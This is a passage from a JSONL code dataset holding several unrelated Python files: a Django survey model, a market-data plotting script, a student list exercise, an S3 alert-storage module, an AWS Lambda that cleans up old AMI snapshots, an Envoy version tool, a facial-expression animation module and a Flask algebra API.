verbose_name=_(\"Have you told this partner your HIV status?\"),\n max_length=30,\n choices=FIRSTDISCLOSE_CHOICE,\n null=True,\n help_text=\"supplemental\")\n\n first_condom_freq = models.CharField(\n verbose_name=_(\"When you have [had] sex with this partner, how often \"\n \"do you or your partner use a condom?\"),\n max_length=25,\n choices=FIRSTCONDOMFREQ_CHOICE,\n null=True,\n help_text=\"supplemental\")\n\n first_partner_cp = models.CharField(\n verbose_name=_(\"To the best of your knowledge, did he/she ever have \"\n \"other sex partners while you two were having a sexual relationship?\"),\n max_length=25,\n choices=YES_NO_UNSURE,\n null=True,\n help_text=\"supplemental\")\n\n class Meta:\n abstract = True\n","sub_path":"apps/bcpp_subject/models/base_sexual_partner.py","file_name":"base_sexual_partner.py","file_ext":"py","file_size_in_byte":4904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"14952338","text":"'''\nThe purpose of this script is to plot time series data for comparison to trading results\n\n\nInput: daily equity value and volatility\n\nOutput: plots over different time frames\n\n\nNotes:\n\n\npandas version: 0.23.4\nmatplotlib version: 2.2.2\nnumpy version: 1.11.3\nscipy version: 1.1.0\n\npython version: 3.5.5\n\n'''\n\nimport csv\nfrom matplotlib import pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport math\n\n\nsp_input_file='data/^GSPC.csv'\nvol_input_file='data/volatility40.csv'\nequity_input_file='_equity_curve_02_05_20_3.csv'\n# ~ vol2_input_file='data/volatility40_2.csv'\n# ~ volmq_input_file='data/vixmq_dec08_to_nov18.csv'\n\n\nsp_data_df = pd.read_csv(sp_input_file,header=0)\nvol_data_df = pd.read_csv(vol_input_file,header=0)\nequity_data_df = pd.read_csv(equity_input_file,header=0)\n# ~ volmq_data_df = pd.read_csv(volmq_input_file,header=0)\n# ~ vol2_data_df = pd.read_csv(vol2_input_file,header=0)\n\n\nsp_date=sp_data_df['Date'].tolist()\nsp_price=sp_data_df['Close'].tolist()\n\nvol_date=vol_data_df['Date'].tolist()\nvol_price=vol_data_df['Volatility'].tolist()\n\nequity_date=equity_data_df['Date'].tolist()\nequity_price=equity_data_df['Equity1'].tolist()\n\n# ~ vol2_date=vol2_data_df['Date'].tolist()\n# ~ vol2_price=vol2_data_df['Volatility'].tolist()\n\n# ~ volmq_date=volmq_data_df['Date'].tolist()\n# ~ volmq_price=volmq_data_df['Close'].tolist()\n\n\n#plot entire series\n'''\nsp_start_idx=2\nsp_end_idx=17420\nvol_start_idx=2\nvol_end_idx=17420\n'''\n\n#plot 20 days around given date\n'''\ndate='2015-08-21'\nsp_date_idx=sp_date.index(date)\nvol_date_idx=vol_date.index(date)\nvolmq_date_idx=volmq_date.index(date)\nsp_start_idx=sp_date_idx-10\nsp_end_idx=sp_date_idx+10\nvol_start_idx=vol_date_idx-10\nvol_end_idx=vol_date_idx+10\nvolmq_start_idx=volmq_date_idx-10\nvolmq_end_idx=volmq_date_idx+10\n\n'''\n#plot 100 days around given date\n'''\ndate='1998-08-21'\nsp_date_idx=sp_date.index(date)\nvol_date_idx=vol_date.index(date)\n# ~ vol2_date_idx=vol2_date.index(date)\n# ~ volmq_date_idx=volmq_date.index(date)\nsp_start_idx=sp_date_idx-50\nsp_end_idx=sp_date_idx+50\nvol_start_idx=vol_date_idx-50\nvol_end_idx=vol_date_idx+50\n# ~ vol2_start_idx=vol2_date_idx-50\n# ~ vol2_end_idx=vol2_date_idx+50\n# ~ volmq_start_idx=volmq_date_idx-50\n# ~ volmq_end_idx=volmq_date_idx+50\n'''\n\n#plot 200 days around given date\n'''\ndate='2018-02-01'\nsp_date_idx=sp_date.index(date)\nvol_date_idx=vol_date.index(date)\nvol2_date_idx=vol2_date.index(date)\nvolmq_date_idx=volmq_date.index(date)\nsp_start_idx=sp_date_idx-100\nsp_end_idx=sp_date_idx+100\nvol_start_idx=vol_date_idx-100\nvol_end_idx=vol_date_idx+100\nvol2_start_idx=vol2_date_idx-100\nvol2_end_idx=vol2_date_idx+100\nvolmq_start_idx=volmq_date_idx-100\nvolmq_end_idx=volmq_date_idx+100\n'''\n\n#plot date range\n\nstart_date='1990-07-13'\n# start_date='1965-08-11'\n# start_date='1972-08-11'\n# start_date='1982-08-11'\n\nend_date='1995-02-10'\n# end_date='1998-10-05'\n# end_date='1982-08-11'\n# end_date='1980-04-30'\n# end_date='1982-08-18'\n# end_date='1987-08-26' # before 1987\n# end_date='1990-03-14'\n# end_date='2019-03-11'\n\nsp_start_idx=sp_date.index(start_date)\nsp_end_idx=sp_date.index(end_date)\nvol_start_idx=vol_date.index(start_date)\nvol_end_idx=vol_date.index(end_date)\nequity_start_idx=equity_date.index(start_date)\nequity_end_idx=equity_date.index(end_date)\n# vol2_start_idx=vol2_date.index(start_date)\n# vol2_end_idx=vol2_date.index(end_date)\n# volmq_start_idx=volmq_date.index(start_date)\n# volmq_end_idx=volmq_date.index(end_date)\n\n\n# remove extras\n\n# ~ volmq_date_plot=volmq_date[volmq_start_idx:volmq_end_idx]\n# ~ volmq_price_plot=volmq_price[volmq_start_idx:volmq_end_idx]\n'''\nvolmq_range=np.arange(volmq_start_idx,volmq_end_idx)\nvol_range=np.arange(vol_start_idx,vol_end_idx)\ni=0\nfor y in range(len(vol_range)):\n\tvol_date_i=vol_date[vol_range[y]]\n\tvolmq_date_i=volmq_date[volmq_range[y+i]]\n\t# print('y: ',y,'i: ',i,' ',vol_date_i,volmq_date_i)\n\tif vol_date_i != volmq_date_i:\n\t\t# print('delete volmq data')\n\t\tdel volmq_date_plot[volmq_range[i]]\n\t\tdel volmq_price_plot[volmq_range[i]]\n\t\ti += 1\n\t\n'''\n# print(len(volmq_date_plot))\n# print(len(vol_date[vol_start_idx:vol_end_idx]))\n\n####\n# plot 2 plots\n####\n'''\nfig = plt.figure()\n# plot s&p\nax = fig.add_subplot(211)\nplt.plot(sp_date[sp_start_idx:sp_end_idx], sp_price[sp_start_idx:sp_end_idx],color='b')\nplt.ylabel('Price')\n# plt.xlabel(r'Date')\nplt.title(r'S&P Price')\n\ngrid_num=15\ntime_step=int((sp_end_idx-sp_start_idx)/grid_num)\nsteps=np.arange(sp_start_idx,sp_end_idx,time_step)\ndates=[sp_date[step] for step in steps]\nax.set_xticks(dates)\nempty_string_labels = ['']*len(dates)\nax.set_xticklabels(empty_string_labels)\n# plt.xticks(rotation=90)\nplt.grid()\n\n#plot vol\nax = fig.add_subplot(212)\nplt.plot(vol_date[vol_start_idx:vol_end_idx], vol_price[vol_start_idx:vol_end_idx],color='b')\n# ~ plt.plot(vol_date[vol_start_idx:vol_end_idx],volmq_price_plot ,color='r')\n# ~ plt.plot(vol2_date[vol2_start_idx:vol2_end_idx], vol2_price[vol2_start_idx:vol2_end_idx],color='g')\nplt.ylabel('Vol')\nplt.xlabel(r'Date')\nplt.title(r'Volatility')\n\ngrid_num=15\ntime_step=int((vol_end_idx-vol_start_idx)/grid_num)\nsteps=np.arange(vol_start_idx,vol_end_idx,time_step)\ndates=[vol_date[step] for step in steps]\nax.set_xticks(dates)\nplt.xticks(rotation=90)\nplt.grid()\n'''\n\n####\n# plot 3 plots\n####\n\nfig = plt.figure()\n# plot s&p\nax = fig.add_subplot(311)\nplt.plot(sp_date[sp_start_idx:sp_end_idx], sp_price[sp_start_idx:sp_end_idx],color='b')\nplt.ylabel('Price')\n# plt.xlabel(r'Date')\nplt.title(r'S&P Price')\n\ngrid_num=15\ntime_step=int((sp_end_idx-sp_start_idx)/grid_num)\nsteps=np.arange(sp_start_idx,sp_end_idx,time_step)\ndates=[sp_date[step] for step in steps]\nax.set_xticks(dates)\nempty_string_labels = ['']*len(dates)\nax.set_xticklabels(empty_string_labels)\n# plt.xticks(rotation=90)\nplt.grid()\n\n#plot vol\nax = fig.add_subplot(312)\nplt.plot(vol_date[vol_start_idx:vol_end_idx], vol_price[vol_start_idx:vol_end_idx],color='b')\n# ~ plt.plot(vol_date[vol_start_idx:vol_end_idx],volmq_price_plot ,color='r')\n# ~ plt.plot(vol2_date[vol2_start_idx:vol2_end_idx], vol2_price[vol2_start_idx:vol2_end_idx],color='g')\nplt.ylabel('Vol')\n# plt.xlabel(r'Date')\nplt.title(r'Volatility')\n\ngrid_num=15\ntime_step=int((vol_end_idx-vol_start_idx)/grid_num)\nsteps=np.arange(vol_start_idx,vol_end_idx,time_step)\ndates=[vol_date[step] for step in steps]\nax.set_xticks(dates)\nempty_string_labels = ['']*len(dates)\nax.set_xticklabels(empty_string_labels)\n# plt.xticks(rotation=90)\nplt.grid()\n\n\n#plot equity\nax = fig.add_subplot(313)\nplt.plot(equity_date[equity_start_idx:equity_end_idx], equity_price[equity_start_idx:equity_end_idx],color='b')\n# ~ plt.plot(vol_date[vol_start_idx:vol_end_idx],volmq_price_plot ,color='r')\n# ~ plt.plot(vol2_date[vol2_start_idx:vol2_end_idx], vol2_price[vol2_start_idx:vol2_end_idx],color='g')\nplt.ylabel('Equity')\nplt.xlabel(r'Date')\nplt.title(r'Equity')\n\ngrid_num=15\ntime_step=int((equity_end_idx-equity_start_idx)/grid_num)\nsteps=np.arange(equity_start_idx,equity_end_idx,time_step)\ndates=[equity_date[step] for step in steps]\nax.set_xticks(dates)\nplt.xticks(rotation=90)\nplt.grid()\n\n\n\nplt.show()\n","sub_path":"scripts/plot_data.py","file_name":"plot_data.py","file_ext":"py","file_size_in_byte":7060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"589813163","text":"listA = []\nlistB = []\nnum = int(input(\"gimme numbers to put in list: \"))\nwhile (num != 0):\n listA.append(num)\n num = int(input(\"gimme another number: \"))\nprint (listA)\n\nlowestNum=listA[0]\nwhile len(listB) < 2:\n for i in range(1, len(listA)):\n if listA[i] < lowestNum:\n lowestNum = listA[i]\n listB.append(lowestNum)\n listA.remove(lowestNum)\nprint (listB[1])\n \n\n\n\n'''\nprint(\"The lowest number in the list is:\", lowestNum)\nprint(\"The position of the lowest number is:\" ,listA.index(lowestNum))\nprint(\"I'm deleting it. BYE!\")\nlistA.remove(lowestNum)\nprint(listA)\n\nlowestNum=listA[0]\nprint(\"So, now - the lowest number in the list is....(AKA the second lowest)\")\n\n for i in range(0, len(listA)):\n if listA[i] < lowestNum:\n lowestNum = listA[i]\n\nprint(\"The lowest number in the list is:\", lowestNum)\n'''\n","sub_path":"Labs/Week4/Lab4_1.2_v2_DoesntWork.py","file_name":"Lab4_1.2_v2_DoesntWork.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"42877644","text":"'''\nAWS S3 communication\n'''\nfrom app.errors import AppBaseError\nimport boto3\nfrom botocore.exceptions import ClientError\nfrom botocore.vendored.requests.exceptions import RequestException\nimport config\nimport datetime\nfrom iso8601 import UTC\nimport json\nimport logging\nimport six\nimport sys\nimport time\n\n_logger = logging.getLogger(__name__)\n\nTS_AWS_S3_BUCKET = config.TS_AWS_S3_BUCKET\nTS_AWS_S3_PREFIX = config.TS_AWS_S3_PREFIX\n\nclass S3ClientError(AppBaseError):\n '''\n S3 client communication errors.\n '''\n\ndef _get_alert_data_key(alert_id):\n '''\n Takes an alert ID and returns an S3 key path.\n '''\n alert_key = '/'.join(['alerts',\n alert_id[0:2],\n alert_id[2:4],\n alert_id\n ])\n\n if TS_AWS_S3_PREFIX:\n alert_key = '/'.join([TS_AWS_S3_PREFIX, alert_key])\n\n return alert_key\n\ndef _get_bucket_objects(prefix=None):\n '''\n Return a list of S3 objects under a given prefix.\n '''\n # We can only get 1000 objects at a time. Also, list_objects() was not\n # returning a Marker on truncated responses so using list_objects_v2()\n # here instead.\n objects = []\n client_continuation_token = ''\n\n s3_client = boto3.client('s3')\n while True:\n list_object_params = {\n 'Bucket': TS_AWS_S3_BUCKET,\n }\n\n if prefix:\n list_object_params['Prefix'] = prefix\n\n if client_continuation_token:\n list_object_params['ContinuationToken'] = client_continuation_token\n\n try:\n response = s3_client.list_objects_v2(**list_object_params)\n except ClientError as e:\n exc_info = sys.exc_info()\n if sys.version_info >= (3,0,0):\n raise S3ClientError(e).with_traceback(exc_info[2])\n else:\n six.reraise(S3ClientError, S3ClientError(e), exc_info[2])\n except RequestException as e:\n exc_info = sys.exc_info()\n if sys.version_info >= (3,0,0):\n raise S3ClientError('Failure to communicate with S3').with_traceback(exc_info[2])\n else:\n six.reraise(S3ClientError, S3ClientError('Failure to communicate with S3'), exc_info[2])\n\n objects += response.get('Contents')\n\n # Break if response tells us there is no more.\n if response.get('IsTruncated'):\n client_continuation_token = response.get('NextContinuationToken')\n else:\n break\n\n return objects\n\ndef _get_webhooks_key_prefix():\n '''\n Return key prefix where webhook data is stored.\n '''\n if TS_AWS_S3_PREFIX:\n webhooks_prefix = '/'.join([TS_AWS_S3_PREFIX, 'webhooks'])\n else:\n webhooks_prefix = 'webhooks'\n\n return webhooks_prefix\n\ndef _put_s3_object(key, body):\n '''\n Put an object in S3.\n '''\n s3_client = boto3.client('s3')\n try:\n response = s3_client.put_object(\n Body=body,\n Bucket=TS_AWS_S3_BUCKET,\n Key=key\n )\n except ClientError as e:\n exc_info = sys.exc_info()\n if sys.version_info >= (3,0,0):\n raise S3ClientError(e).with_traceback(exc_info[2])\n else:\n six.reraise(S3ClientError, S3ClientError(e), exc_info[2])\n except RequestException as e:\n exc_info = sys.exc_info()\n if sys.version_info >= (3,0,0):\n raise S3ClientError('Failure to communicate with S3').with_traceback(exc_info[2])\n else:\n six.reraise(S3ClientError, S3ClientError('Failure to communicate with S3'), exc_info[2])\n\n return response\n\ndef is_available():\n '''\n Check ability to access S3 bucket.\n '''\n s3_client = boto3.client('s3')\n try:\n kwargs = {'Bucket': TS_AWS_S3_BUCKET}\n if TS_AWS_S3_PREFIX:\n kwargs['Prefix'] = TS_AWS_S3_PREFIX\n s3_client.list_objects(**kwargs)\n except ClientError as e:\n exc_info = sys.exc_info()\n if sys.version_info >= (3,0,0):\n raise S3ClientError(e).with_traceback(exc_info[2])\n else:\n six.reraise(S3ClientError, S3ClientError(e), exc_info[2])\n except RequestException as e:\n exc_info = sys.exc_info()\n if sys.version_info >= (3,0,0):\n raise S3ClientError('Failure to communicate with S3').with_traceback(exc_info[2])\n else:\n six.reraise(S3ClientError, S3ClientError('Failure to communicate with S3'), exc_info[2])\n\n return True\n\ndef get_alert_by_id(alert_id):\n '''\n Get alert by alert ID\n '''\n alert_key = _get_alert_data_key(alert_id)\n s3_client = boto3.client('s3')\n try:\n alert_data = s3_client.get_object(\n Bucket=TS_AWS_S3_BUCKET,\n Key=alert_key\n )\n except ClientError as e:\n exc_info = sys.exc_info()\n if sys.version_info >= (3,0,0):\n raise S3ClientError(e).with_traceback(exc_info[2])\n else:\n six.reraise(S3ClientError, S3ClientError(e), exc_info[2])\n except RequestException as e:\n exc_info = sys.exc_info()\n if sys.version_info >= (3,0,0):\n raise S3ClientError('Failure to communicate with S3').with_traceback(exc_info[2])\n else:\n six.reraise(S3ClientError, S3ClientError('Failure to communicate with S3'), exc_info[2])\n\n\n body = alert_data.get('Body')\n body_text = body.read()\n\n return json.loads(body_text)\n\ndef get_alerts_by_date(start, end):\n '''\n Get alerts between given date start and end.\n\n both start and end are datetime objects with timezone info\n '''\n # We store webhooks by date and time so we search for those first.\n webhooks_prefix = _get_webhooks_key_prefix()\n webhook_objects = _get_bucket_objects(webhooks_prefix)\n\n alert_ids = []\n for obj in webhook_objects:\n key = obj.get('Key')\n # Remove webhook path prefix (and delimiter) and split string into\n # time prefix and alert ID.\n webhook_time_prefix, alert_id = key[len(webhooks_prefix) + 1:].rsplit('/', 1)\n # There are more compact ways of doing the following but I prefer to\n # show the sequence of events.\n #\n # split prefix into a list of strings.\n webhook_time_prefix_list = webhook_time_prefix.split('/')\n # use list comprehension to create a list of ints. See also:\n # map(int, webhook_time_prefix_list)\n webhook_time_prefix_ints = [int(e) for e in webhook_time_prefix_list]\n # use *expression syntax to pass in values as a set of arguments. Also\n # supply tzinfo because the datetime objects we're supplied have them.\n webhook_time = datetime.datetime(*webhook_time_prefix_ints, tzinfo=UTC)\n\n if start < webhook_time < end:\n alert_ids.append(alert_id)\n\n alerts = []\n for alert_id in alert_ids:\n alert_data = get_alert_by_id(alert_id)\n alerts.append(alert_data)\n\n return alerts\n\ndef put_webhook_data(alert):\n '''\n Put alert webhook data in S3 bucket.\n '''\n alert_time = time.gmtime(alert.get('created_at')/1000)\n alert_time_path = time.strftime('%Y/%m/%d/%H/%M', alert_time)\n webhooks_prefix = _get_webhooks_key_prefix()\n alert_key = '/'.join([webhooks_prefix, alert_time_path, alert.get('id')])\n alert_json = json.dumps(alert)\n\n _put_s3_object(alert_key, alert_json)\n\n return None\n\ndef put_alert_data(alert):\n '''\n Put alert data in S3.\n '''\n alert_id = alert.get('id')\n alert_key = _get_alert_data_key(alert_id)\n alert_json = json.dumps(alert)\n\n _put_s3_object(alert_key, alert_json)\n\n return None\n\n","sub_path":"app/models/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":7649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"502938536","text":"from datetime import datetime, timedelta, timezone\nimport datetime\nimport boto3\n\nec2_client = boto3.client('ec2')\n\nclass Ec2Instances(object):\n \n def __init__(self, region):\n print(\"region \"+ region)\n self.ec2 = boto3.client('ec2', region_name=region)\n \n def delete_snapshots(self, older_days=14):\n delete_snapshots_num = 0\n imagesList = self.get_images()\n \n for image in imagesList:\n str_creation_date = image['CreationDate']\n #print(\"CreationDate String: \" + str_creation_date)\n \n fmt_creation_date = datetime.datetime.strptime(str_creation_date, '%Y-%m-%dT%H:%M:%S.%fZ')\n print(\"CreationDate Formatted: \" + str(fmt_creation_date))\n \n print(\"Cutoff time: \" + str(self.get_delete_data(older_days))) \n print(\"-------------\")\n print(\"-------------\")\n \n if (fmt_creation_date < self.get_delete_data(older_days)):\n print(\"Deregistering image %s\" % image['ImageId'])\n amiResponse = ec2_client.deregister_image(\n ImageId=image['ImageId'],\n )\n #print(amiResponse)\n print(\"-------------\")\n\n block_device_mappings = image['BlockDeviceMappings']\n #print(\"block_device_mapping: %s\", block_device_mappings)\n #print(\"mappings: %s\", len(block_device_mappings))\n \n for block_device_mapping in block_device_mappings:\n if \"Ebs\" in block_device_mapping:\n device = block_device_mapping['Ebs']\n #print(\"ebs: %s\", device)\n snapshot_id = device['SnapshotId']\n print(\"snapshot_id: %s\", snapshot_id)\n snapResponse = ec2_client.delete_snapshot(\n SnapshotId=snapshot_id)\n #print(snapResponse)\n print(\"Deleted snapshot: %s \", snapshot_id)\n delete_snapshots_num = delete_snapshots_num + 1\n\n return delete_snapshots_num\n \n def get_images(self):\n images = self.ec2.describe_images(Filters=[{'Name': 'name', 'Values': ['MaintenanceWindow*']}])\n #print(\"filtered images \" + str(images))\n return images['Images']\n\n def get_delete_data(self, older_days):\n delete_time = datetime.datetime.now(tz=None) - timedelta(days=older_days)\n return delete_time;\n \ndef lambda_handler(event, context):\n print(\"event \" + str(event))\n print(\"context \" + str(context))\n region_name = \"eu-west-1\"\n instances = Ec2Instances(region_name)\n deleted_counts = instances.delete_snapshots(14)\n print(\"deleted_counts for region \"+ str(region_name) +\" is \" + str(deleted_counts))\n return 'completed'","sub_path":"daily_mw_snapshot_cleanup/auto_daily_mw_snapshot_cleanup.py","file_name":"auto_daily_mw_snapshot_cleanup.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"394966768","text":"\nimport pathlib\nimport sys\n\nfrom packaging import version\n\nimport yaml\n\n\ndef main(path):\n \"\"\"Release versions derived from directory names in `envoy/docs`.\n\n Currently this determines stable <> archived based on the last\n 4 minor versions being stable. We may want to rethink this.\n \"\"\"\n\n # Read the versions from the directory names\n versions = [\n version.Version(x.name)\n for x\n in pathlib.Path(path).glob(\"v*\")]\n\n # Group versions into minor versions\n minor_versions = {}\n for v in versions:\n minor = version.Version(f\"{v.major}.{v.minor}\")\n minor_versions[minor] = minor_versions.get(minor, [])\n minor_versions[minor].append(v)\n\n # Sort the minor version keys\n sorted_minor_versions = list(reversed(sorted(minor_versions)))\n\n # Dump the YAML\n print(yaml.dump([\n dict(title=\"Stable versions\",\n versions=[\n dict(version=v.base_version,\n releases=[\n _v.base_version\n for _v\n in reversed(sorted(minor_versions[v]))])\n for v\n in sorted_minor_versions[:4]]),\n dict(\n title=\"Development version\",\n versions=[dict(version=\"Latest\")]),\n dict(title=\"Archived versions\",\n versions=[\n dict(version=v.base_version,\n releases=[\n _v.base_version\n for _v\n in reversed(sorted(minor_versions[v]))])\n for v\n in sorted_minor_versions[4:]])]))\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1])\n","sub_path":"tools/versions/release_versions.py","file_name":"release_versions.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"600890521","text":"from __future__ import print_function, division, absolute_import\n\nimport os\nimport sys\nfrom six import add_metaclass\n\nfrom abc import abstractmethod, abstractproperty, ABCMeta\nimport numpy as np\n\nfrom utils import read_openface\n\n# ===========================================================================\n# Helper\n# ===========================================================================\n# path to the database\nDATABASE = os.path.join(os.path.dirname(sys.argv[0]), \"database\")\n\n\ndef _searching_expression(name, level, nframes, extension):\n def distance_func(x):\n x = x.split('.')[0].split('_')\n l1 = int(x[1])\n n1 = int(x[2])\n return abs(l1 - level) * 10000 + abs(n1 - nframes)\n all_files = [i for i in os.listdir(DATABASE) if extension in i]\n # match the name\n all_files = [i for i in all_files if name + \"_\" in i]\n # match all <= intensity, and sorted by order of decreasing\n all_files = sorted([i for i in all_files if int(i.split('_')[1]) <= level],\n key=lambda x: distance_func(x))\n if len(all_files) == 0:\n raise ValueError(\"Cannot file any file with, \"\n \"name:%s, level:%d, nframes:%d, ext:%s\" % (name, level, nframes, extension))\n # ====== found file ====== #\n found = all_files[0]\n desire_name = \"%s_%d_%d\" % (name, level, nframes)\n if found.split('.')[0] != desire_name:\n print(\"[WARNING] Request expression with configuration: %-12s, but only \"\n \"found expression: %-12s\" % (desire_name, found.split('.')[0]))\n return os.path.join(DATABASE, found)\n\n\ndef interpolate(last_frame, first_frame, nFrames):\n res = []\n for i in range(nFrames):\n temp = [(1 - i / float(nFrames - 1)) * x + (i / float(nFrames - 1)) * y\n for x, y in zip(last_frame, first_frame)]\n temp = np.concatenate([t[None, :] for t in temp])[None, :]\n res.append(temp)\n res = np.concatenate(res, 0)\n return res\n\n\n# ===========================================================================\n# Expression\n# ===========================================================================\n@add_metaclass(ABCMeta)\nclass Expression(object):\n \"\"\" Expression\n Attributes\n ----------\n frames: ndarray [nb_frames x nb_points_per_frames(68) x 3(x,y,z)]\n audio: str (path to wav file)\n \"\"\"\n\n def __init__(self, level, nframes):\n super(Expression, self).__init__()\n self._name = self.__class__.__name__.lower()\n self._level = level\n self._nframes = nframes\n # ====== find appropriate frames file ====== #\n _ = _searching_expression(self._name, self._level, self._nframes, '.csv')\n self._frames = read_openface(_)\n # infer audio file name from frames file name\n _ = os.path.basename(_).split('.')[0] + '.wav'\n self._audio = os.path.join(DATABASE, _)\n if not os.path.exists(self._audio):\n raise RuntimeError(\"Cannot find audio file for the expression: %s, \"\n \"at path: %s\" % (self.name, self._audio))\n\n def __getitem__(self, idx):\n return self._frames[idx]\n\n @property\n def name(self):\n return \"%s_%d_%d\" % (self._name, self._level, self._nframes)\n\n @property\n def level(self):\n return self._level\n\n @property\n def nframes(self):\n return self._nframes\n\n @property\n def frames(self):\n return self._frames\n\n @property\n def audio(self):\n return self._audio\n\n def copy(self):\n clazz = self.__class__\n obj = clazz.__new__(clazz)\n obj._name = self._name\n obj._level = self._level\n obj._nframes = self._nframes\n obj._frames = np.copy(self._frames)\n obj._audio = self._audio\n return obj\n\n def __str__(self):\n return \"<[%s] level:%d #frames:%d audio:%s>\" % \\\n (self.__class__.__name__, self._level, self._nframes, self._audio)\n\n # ==================== Frames manipulation ==================== #\n def set_reference(self, frame):\n \"\"\" Use a frame as a reference for this expression\n * Calculating the cummulative differences of all frames to the first\n frame of this expression.\n * Adding the differences to the reference frame.\n \"\"\"\n frame = np.expand_dims(frame, 0)\n if frame.shape != (1,) + self.frames.shape[1:]:\n raise ValueError(\"Reference frame must have shape: %s\" %\n self.frames.shape[1:])\n offset = self._frames[1:] - self._frames[:-1]\n offset = np.cumsum(offset, axis=0)\n self._frames = frame + offset\n return self\n\n def after(self, expression, interp=5):\n \"\"\" Interplolate this expression so it can be played after\n the given expression in the argument.\n Step-by-step of the interpolation:\n * Calculate interpolation frames from the last frame of given\n expression to first frame of this expression.\n * Add the cummulative differences of this expression the\n the last frame of the interpolated frames.\n * Woala!\n \"\"\"\n if not isinstance(expression, Expression):\n raise ValueError(\"`expression` argument must be instance of Expression.\")\n last_frame = expression[-1]\n # ====== interpolate first ====== #\n interp = interpolate(last_frame, self.frames[0], nFrames=interp)\n # ====== adding offset ====== #\n offset = self._frames[1:] - self._frames[:-1]\n offset = np.cumsum(offset, axis=0)\n last_frame = np.expand_dims(interp[-1], 0)\n offset = offset + last_frame\n # ====== assign ====== #\n self._frames = np.concatenate([interp, offset], axis=0)\n return self\n\n def merge(self, expr):\n raise NotImplementedError\n\n def adjust(self, length, nframes):\n raise NotImplementedError\n\n\n# NOTE: you only need to name the class matching the expression name.\nclass Happy(Expression):\n pass\n\n\nclass Sad(Expression):\n pass\n\n\nclass Laugh(Expression):\n pass\n","sub_path":"SynthesisModule/expression.py","file_name":"expression.py","file_ext":"py","file_size_in_byte":6043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"32623618","text":"from contextlib import contextmanager\nimport re\nimport os\n\ndef pystringtest():\n words : str = 'Connect Foundation'\n clearring = re.compile(r'\\W')\n\n if 'F' in words:\n words.lower()\n # words[7] = '&'\n words = re.sub(clearring, '&', words\n )\n else:\n print(words)\n\n print(words)\n\ndef pylisttest():\n words : list = [\"Hello\", \"Happy\", \"World\"]\n print(id(words))\n words.append([\"Connect\", \"Foundation\", \"Education\"])\n print(id(words))\n words.extend([\"Here\", 2018]) # Equivalent to words += [\"Here\", 2018]\n print(id(words))\n\n print(words)\n print(len(words))\n\n@contextmanager\ndef open_file(filename : str, mode : str):\n try:\n f = open(filename, mode)\n yield f\n except:\n f.close()\n\ndef pydicttest():\n counts : dict = dict()\n names : list = ['csen', 'cwen', 'csen', 'derr', 'csen', 'derr', 'cwen', 'csen']\n for name in names:\n counts[name] = counts.get(name, 0) + 1\n print(counts, end=\"\\n--------------------------------------------\\n\")\n\n freq = dict()\n splitpattern = re.compile(r'[\\s]+')\n removepattern = re.compile(r'\\W') # Equivalent to re.compile(r'[a-zA-Z0-9_]')\n with open_file(\"countries.txt\", 'r') as file:\n for line in file:\n words : list = re.split(splitpattern, line)[:-1]\n for word in words:\n if word == '':\n continue\n word = re.sub(removepattern, '', word)\n freq[word] = freq.get(word, 0) + 1\n\n print(dict(sorted(freq.items())))\n print(sorted([(v,k) for k,v in freq.items()]))\n\n bigword = None\n bigcount = None\n for word, count in freq.items():\n if bigcount is None or count > bigcount:\n bigword = word\n bigcount = count\n\n print(bigword, bigcount)\n\nif __name__ == \"__main__\":\n pystringtest()\n print()\n pylisttest()\n print()\n pydicttest()\n print()\n\n\n","sub_path":"pytest001/src/mytest01/string-test01.py","file_name":"string-test01.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"608542425","text":"\nfrom flask import Flask\nfrom flask import jsonify\nfrom flask import request\nimport sys\nfrom helper import algebra\nfrom helper import algebra2d\nfrom helper import algebra3d\n\napp = Flask(__name__)\n\n\n@app.route(\"/3D\", methods=['POST', 'GET'])\ndef algebra3D_API():\n # Request Structure:\n # equation\n # xStart\n # yStart\n # xEnd\n # yEnd\n # Return Structure:\n # equation\n # latex\n # xValues\n # yValues\n # zValues\n\n # Get Data\n req = request.get_json(force=True)\n print(req)\n\n # Process Data\n equation = algebra.getStringEq(req['equation'])\n latex = algebra.getLatexEq(equation)\n xStart = req['xStart']\n xEnd = req['xEnd']\n yStart = req['yStart']\n yEnd = req['yEnd']\n\n xValues, yValues, zValues = algebra3d.getZSurface(\n equation, xStart, yStart, xEnd, yEnd)\n\n # Package Data\n resp = {\n \"equation\": equation,\n \"latex\": latex,\n \"xValues\": xValues.astype(float).tolist(),\n \"yValues\": yValues.astype(float).tolist(),\n \"zValues\": zValues.astype(float).tolist()\n }\n\n print(resp)\n\n return jsonify(resp)\n\n\n@app.route(\"/2D\", methods=['POST', 'GET'])\ndef algebra2D_API():\n # Request Structure:\n # Xequation\n # Yequation\n # start\n # end\n\n # Return Structure:\n # equation\n # latex\n # xValues\n # yValues\n\n # Get Data\n req = request.get_json(force=True)\n print(req)\n\n # Process Data\n Xequation = req['Xequation']\n Yequation = req['Yequation']\n start = req['start']\n end = req['end']\n\n if(Xequation != \"\"):\n # Process as equation in terms of y\n equation = algebra.getStringEq(Xequation)\n xValues, yValues = algebra2d.getXYValuesFromXEq(equation, start, end)\n else:\n # Process as equation in terms of x\n equation = algebra.getStringEq(Yequation)\n xValues, yValues = algebra2d.getXYValuesFromYEq(equation, start, end)\n\n latex = algebra.getLatexEq(equation)\n\n # Package Data\n resp = {\n \"equation\": equation,\n \"latex\": latex,\n \"xValues\": xValues.astype(float).tolist(),\n \"yValues\": yValues.astype(float).tolist(),\n }\n\n print(resp)\n\n return jsonify(resp)\n\n\n@app.route(\"/\")\ndef hello_world():\n return \"hello 